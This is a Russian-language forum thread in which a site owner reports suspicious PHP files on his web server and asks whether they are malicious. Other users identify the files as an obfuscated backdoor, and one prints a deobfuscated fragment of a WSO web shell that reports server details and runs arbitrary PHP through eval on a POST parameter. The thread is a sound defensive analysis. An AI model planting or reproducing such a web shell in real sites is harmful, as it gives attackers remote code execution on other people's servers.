[scream]

Здравствуйте!

Походу меня взломали!

Сегодня чисто случайно у себя на сервере в каталоге где расположен сайт обнаружил какие то левые папки и внутри этих папок по два скрипта php.

Так как в php я не разбираюсь выкладываю содержимое этих двух скриптов одной из папок!

Подскажите пожалуйста по исходному коду вредоносный он или нет.

Заранее спасибо!

.9a476f.php

page.php

[Abram]

Разбирать это долго, но судя по обсуфикации - банальный зловред. Залили скорее всего через дырку в вашем движке.

 

Ну да.

http://www.unphp.net/decode/150e76a7959a10e963594936048a363a/

Выполняет любой PHP-код из переменной $_POST['p1'].

По сути - простенький backdoor, через который вам скорее всего залили уже что-то более весёлое.

[scream]

Разбирать это долго, но судя по обсуфикации - банальный зловред. Залили скорее всего через дырку в вашем движке.

 

Ну да.

http://www.unphp.net/decode/150e76a7959a10e963594936048a363a/

Выполняет любой PHP-код из переменной $_POST['p1'].

По сути - простенький backdoor, через который вам скорее всего залили уже что-то более весёлое.

 

Спасибо!

[terrible]

baсkdoor 100%, небольшой отрезок кода, переведённого в читабельный вид:

 

	function actionRC(){
	if(!@$_POST["p1"]) {
		$ugtfpiyrum="a";
		$GLOBALS["vrvweypznipu"]=array("uname"=>php_uname(),"php_version"=>phpversion(),"wso_version"=>WSO_VERSION,"safemode"=>@ini_get("safe_mode"));
		echo serialize(${$ugtfpiyrum});
	} else { 
		eval($_POST["p1"]);
	}
}
if(!empty($_POST["a"])&&function_exists("action".$_POST["a"]))call_user_func("action".$_POST["a"]);
exit;